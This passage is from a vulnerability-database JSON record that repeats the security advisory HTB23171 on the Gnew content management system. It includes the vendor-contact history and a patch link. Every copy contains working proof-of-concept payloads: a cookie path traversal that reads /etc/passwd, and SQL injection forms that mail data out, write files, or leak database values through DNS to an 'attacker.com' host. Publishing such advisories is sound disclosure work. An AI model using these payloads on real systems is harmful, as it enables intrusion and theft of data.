version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2.7 The vulnerability exists due to insufficient filtration of \"thread_id\" HTTP POST parameter passed to \"/posts/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \n \n<form action=\"http://[host]/posts/add.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add\" value=\"1\"> \n<input type=\"hidden\" name=\"preview\" value=\"1\"> \n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2.8 The vulnerability exists due to insufficient filtration of \"thread_id\" HTTP POST parameter passed to \"/posts/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \n \n<form action=\"http://[host]/posts/edit.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"edit\" value=\"1\"> \n<input type=\"hidden\" name=\"preview_edited\" value=\"1\"> \n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \nSuccessful exploitation of vulnerabilities 2.3-2.8 requires that attacker is registered and logged-in. Registration is opened by default. \n \n \nVulnerabilities 2.1, 2.2 and 2.8 were discovered by Gjoko Krstic: http://packetstormsecurity.com/files/122771 on July 23, 2013. High-Tech Bridge Research Lab has discovered these vulnerabilities independently and publishes them as since the Vendor notification date they remain unpatched. \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nVendor did not reply to 6 notifications by email. Currently we are not aware of any official solution for these vulnerabilities. \n \nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23171-patch.zip \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23171 - https://www.htbridge.com/advisory/HTB23171 - Multiple vulnerabilities in Gnew. \n[2] Gnew - http://www.gnew.fr - Gnew is a simple and open-source Content Management System. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123482/gnew-lfisql.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "SECURITYVULNS:VULN:13311", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13311", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23171\r\nProduct: Gnew\r\nVendor: Raoul Proenca\r\nVulnerable Version(s): 2013.1 and probably prior\r\nTested Version: 2013.1\r\nAdvisory Publication: August 28, 2013 [without technical details]\r\nVendor Notification: August 28, 2013 \r\nPublic Disclosure: October 2, 2013 \r\nVulnerability Type: PHP File Inclusion [CWE-98], SQL Injection [CWE-89]\r\nCVE References: CVE-2013-5639, CVE-2013-5640\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Gnew, which can be exploited to execute arbitrary PHP code and pefrom SQL injection attacks against vulnerable application. \r\n\r\n\r\n1) PHP File Inclusion in Gnew: CVE-2013-5639\r\n\r\nVulnerability exists due to insufficient validation of user-supplied input passed via the "gnew_language" cookie to "/users/login.php" script before using it in "include()" function. A remote attacker can include and execute arbitrary local files on a vulnerable system via directory traversal sequence and URL-encoded NULL byte.\r\n\r\nThe following exploitation example below displays content of the "/etc/passwd" file:\r\n\r\n\r\nGET /users/login.php HTTP/1.1\r\nCookie: gnew_language=../../../etc/passwd%00;\r\n\r\n\r\n\r\n2) SQL Injection in Gnew: CVE-2013-5640\r\n\r\n2.1 The vulnerability exists due to insufficient filtration of "friend_email" HTTP POST parameter passed to "/news/send.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe following exploitation example sends MySQL server version and database username to email address "attacker@mail.com":\r\n\r\n\r\n<form action="http://[host]/news/send.php" method="post" name="main">\r\n<input type="hidden" name="send" value="1">\r\n<input type="hidden" name="user_name" value="username">\r\n<input type="hidden" name="user_email" value="user@mail.com">\r\n<input type="hidden" name="friend_email" value="attacker@mail.com">\r\n<input type="hidden" name="news_id" value="-1' UNION SELECT version(),user() -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2.2 The vulnerability exists due to insufficient filtration of "user_email" HTTP POST parameter passed to "/users/register.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe exploitation example below outputs database username and MySQL server version into file "/var/www/file.txt". Successful exploitation requires that MySQL server has write access to the "/var/www" directory. \r\n\r\n\r\n<form action="http://[host]/users/register.php" method="post" name="main">\r\n<input type="hidden" name="register" value="1">\r\n<input type="hidden" name="user_email" value="' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' -- 2">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2.3 The vulnerability exists due to insufficient filtration of "answer_id" HTTP POST parameter passed to "/polls/vote.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n\r\n<form action="http://[host]/polls/vote.php" method="post" name="main">\r\n<input type="hidden" name="add_vote" value="1">\r\n<input type="hidden" name="answer_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">\r\n<input type="hidden" name="question_id" value="1">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2.4 The vulnerability exists due to insufficient filtration of "question_id" HTTP POST parameter passed to "/polls/vote.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n\r\n<form action="http://[host]/polls/vote.php" method="post" name="main">\r\n<input type="hidden" name="add_vote" value="1">\r\n<input type="hidden" name="answer_id" value="1">\r\n<input type="hidden" name="question_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2.5 The vulnerability exists due to insufficient filtration of "story_id" HTTP POST parameter passed to "/comments/add.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n\r\n<form action="http://[host]/comments/add.php" method="post" name="main">\r\n<input type="hidden" name="add" value="1">\r\n<input type="hidden" name="preview" value="1">\r\n<input type="hidden" name="comment_subject" value="1">\r\n<input type="hidden" name="comment_text" value="1">\r\n<input type="hidden" name="story_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2.6 The vulnerability exists due to insufficient filtration of "story_id" HTTP POST parameter passed to "/comments/edit.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n\r\n<form action="http://[host]/comments/edit.php" method="post" name="main">\r\n<input type="hidden" name="edit" value="1">\r\n<input type="hidden" name="preview_edited" value="1">\r\n<input type="hidden" name="comment_subject" value="1">\r\n<input type="hidden" name="comment_text" value="1">\r\n<input type="hidden" name="story_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2.7 The vulnerability exists due to insufficient filtration of "thread_id" HTTP POST parameter passed to "/posts/add.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n\r\n<form action="http://[host]/posts/add.php" method="post" name="main">\r\n<input type="hidden" name="add" value="1">\r\n<input type="hidden" name="preview" value="1">\r\n<input type="hidden" name="thread_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2.8 The vulnerability exists due to insufficient filtration of "thread_id" HTTP POST parameter passed to "/posts/edit.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n\r\n<form action="http://[host]/posts/edit.php" method="post" name="main">\r\n<input type="hidden" name="edit" value="1">\r\n<input type="hidden" name="preview_edited" value="1">\r\n<input type="hidden" name="thread_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\nSuccessful exploitation of vulnerabilities 2.3-2.8 requires that attacker is registered and logged-in. Registration is opened by default.\r\n\r\n\r\nVulnerabilities 2.1, 2.2 and 2.8 were discovered by Gjoko Krstic: http://packetstormsecurity.com/files/122771 on July 23, 2013. High-Tech Bridge Research Lab has discovered these vulnerabilities independently and publishes them as since the Vendor notification date they remain unpatched.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nVendor did not reply to 6 notifications by email. Currently we are not aware of any official solution for these vulnerabilities.\r\n\r\nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23171-patch.zip\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23171 - https://www.htbridge.com/advisory/HTB23171 - Multiple vulnerabilities in Gnew.\r\n[2] Gnew - http://www.gnew.fr - Gnew is a simple and open-source Content Management System.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "SECURITYVULNS:DOC:29857", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29857", "title": "Multiple Vulnerabilities in Gnew", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "htbridge": [{"lastseen": "2017-06-23T23:08:26", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Gnew, which can be exploited to execute arbitrary PHP code and pefrom SQL injection attacks against vulnerable application. \n \n1) PHP File Inclusion in Gnew: CVE-2013-5639 \nVulnerability exists due to insufficient validation of user-supplied input passed via the \"gnew_language\" cookie to \"/users/login.php\" script before using it in \"include()\" function. A remote attacker can include and execute arbitrary local files on a vulnerable system via directory traversal sequence and URL-encoded NULL byte. \nThe following exploitation example below displays content of the \"/etc/passwd\" file: \nGET /users/login.php HTTP/1.1 \nCookie: gnew_language=../../../etc/passwd%00; \n \n2) SQL Injection in Gnew: CVE-2013-5640 \n2.1 The vulnerability exists due to insufficient filtration of \"friend_email\" HTTP POST parameter passed to \"/news/send.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \nThe following exploitation example sends MySQL server version and database username to email address \"attacker@mail.com\": \n<form action=\"http://[host]/news/send.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"send\" value=\"1\"> \n<input type=\"hidden\" name=\"user_name\" value=\"username\"> \n<input type=\"hidden\" name=\"user_email\" value=\"user@mail.com\"> \n<input type=\"hidden\" name=\"friend_email\" value=\"attacker@mail.com\"> \n<input type=\"hidden\" name=\"news_id\" value=\"-1' UNION SELECT version(),user() -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2.2 The vulnerability exists due to insufficient filtration of \"user_email\" HTTP POST parameter passed to \"/users/register.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \nThe exploitation example below outputs database username and MySQL server version into file \"/var/www/file.txt\". Successful exploitation requires that MySQL server has write access to the \"/var/www\" directory. \n<form action=\"http://[host]/users/register.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"register\" value=\"1\"> \n<input type=\"hidden\" name=\"user_email\" value=\"' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' -- 2\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2.3 The vulnerability exists due to insufficient filtration of \"answer_id\" HTTP POST parameter passed to \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add_vote\" value=\"1\"> \n<input type=\"hidden\" name=\"answer_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"hidden\" name=\"question_id\" value=\"1\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2.4 The vulnerability exists due to insufficient filtration of \"question_id\" HTTP POST parameter passed to \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add_vote\" value=\"1\"> \n<input type=\"hidden\" name=\"answer_id\" value=\"1\"> \n<input type=\"hidden\" name=\"question_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2.5 The vulnerability exists due to insufficient filtration of \"story_id\" HTTP POST parameter passed to \"/comments/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n<form action=\"http://[host]/comments/add.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add\" value=\"1\"> \n<input type=\"hidden\" name=\"preview\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_subject\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_text\" value=\"1\"> \n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2.6 The vulnerability exists due to insufficient filtration of \"story_id\" HTTP POST parameter passed to \"/comments/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n<form action=\"http://[host]/comments/edit.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"edit\" value=\"1\"> \n<input type=\"hidden\" name=\"preview_edited\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_subject\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_text\" value=\"1\"> \n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2.7 The vulnerability exists due to insufficient filtration of \"thread_id\" HTTP POST parameter passed to \"/posts/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n<form action=\"http://[host]/posts/add.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add\" value=\"1\"> \n<input type=\"hidden\" name=\"preview\" value=\"1\"> \n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2.8 The vulnerability exists due to insufficient filtration of \"thread_id\" HTTP POST parameter passed to \"/posts/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n<form action=\"http://[host]/posts/edit.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"edit\" value=\"1\"> \n<input type=\"hidden\" name=\"preview_edited\" value=\"1\"> \n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \nSuccessful exploitation of vulnerabilities 2.3-2.8 requires that attacker is registered and logged-in. Registration is opened by default. \n \nVulnerabilities 2.1, 2.2, 2.5 and 2.8 were discovered by Gjoko Krstic: http://packetstormsecurity.com/files/122771 on July 23, 2013. High-Tech Bridge Research Lab has discovered these vulnerabilities independently and publishes them as since the Vendor notification date they remain unpatched.\n", "modified": "2013-10-02T00:00:00", "published": "2013-08-28T00:00:00", "id": "HTB23171", "href": "https://www.htbridge.com/advisory/HTB23171", "type": "htbridge", "title": "Multiple Vulnerabilities in Gnew", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/"}}]}